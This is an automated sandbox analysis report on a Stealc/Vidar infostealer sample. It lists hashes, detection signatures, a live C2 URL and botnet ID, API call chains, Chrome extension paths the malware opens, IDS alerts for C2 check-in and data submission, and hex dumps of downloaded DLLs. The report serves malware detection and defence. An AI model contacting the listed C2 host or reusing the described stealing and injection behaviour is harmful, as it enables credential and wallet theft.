Windows Analysis Report
5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe

Overview

General Information

Sample name: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
Analysis ID: 1538409
MD5: 217e6aff108174a9a90022c19f8e5f8f
SHA1: a46822575426c3fac79c55f9cf9f8adb907ec58b
SHA256: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717ceebaa28e2f865471e6
Tags: exe, Stealc, user-abuse_ch
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
Source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe ReversingLabs: Detection: 52%
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Virustotal: Detection: 54%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02759B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 1_2_02759B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02757240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 1_2_02757240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02759AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_02759AC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02768EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 1_2_02768EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275C820 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 1_2_0275C820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 1_2_6C806C80
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdb source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275BE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_027516D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275F6B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02763EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_02763EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275DA80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0275E430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_02764910
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275DE10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_027638B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_02764570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0275ED20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 147.45.44.221:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.44.221:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Malware configuration extractor URLs: http://147.45.44.221/28166bd28a5d19e6.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 12:30:30 GMTETag: "10e436-5e7ed3ec64580"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "a7550-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "94750-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "6dde8-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
